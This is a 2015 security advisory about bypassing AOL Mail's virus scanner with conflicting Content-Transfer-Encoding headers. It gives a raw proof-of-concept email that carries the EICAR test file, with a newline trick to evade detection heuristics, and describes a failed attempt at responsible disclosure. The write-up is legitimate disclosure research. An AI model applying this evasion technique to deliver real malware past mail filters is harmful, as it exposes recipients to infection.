July 2015
Please note that republishing this article in full or in part is only allowed under the conditions described here.
Bypassing AOL Mail Virus Scanning with Conflicting Content-Transfer-Encoding Headers
The virus scanner integrated in AOL Mail can be bypassed by using conflicting Content-Transfer-Encoding headers, as described in Dubious MIME - Conflicting Content-Transfer-Encoding Headers.
Proof Of Concept
The webmail interface of AOL Mail will use the first Content-Transfer-Encoding header 'base64' for
displaying the mail and for downloads. It thus provides access to the attached file 'eicar.com'
which contains the Eicar test virus.
The virus scanner instead will use the second Content-Transfer-Encoding header 'quoted-printable'
and is thus not able to detect the virus (if the headers are switched the mail will be successfully
blocked).
Note that it is necessary to put some seemingly wrong newline inside the base64 encoding of the
virus. It looks like the virus scanner has heuristics to detect the "common" base64 encoding even
if it is not explicitly declared. With adding this newline these heuristics are defeated without
affecting the decoding in the webmail interface.
From: foo
To: bar
Subject: eicar - conflicting content-transfer-encoding
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary=foo
--foo
Content-type: application/octet-stream; name="eicar.com"
Content-Transfer-Encoding: base64
Content-Transfer-Encoding: quoted-printable
WD
VPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNU
LUZJTEUhJEgrSCo=
--foo--
Responsible Disclosure - failed
I've tried to report the issue to AOL but was not successful. Since I did not find any contact specifically for reporting security issues I've used their generic contact formular in 06/2015 and pointing out that I had a security problem to report (without all the details). More than a month later I got some mail back which only contained the standard security tips but did not give me a contact where I could report the security issue:
Date: Mon, 20 Jul 2015 13:06:41 +0000 (GMT) From: "aoldefragen@aol.com" <aoldefragen@aol.com> Subject: DE: Contact Request [ ref:_00DF06aAH._500F0bsRQP:ref ] ... wir empfehlen Ihnen, die folgenden Sicherheitshinweise zu beachten, um Ihren Computer und Ihre persönlichen Daten zu schützen: - ...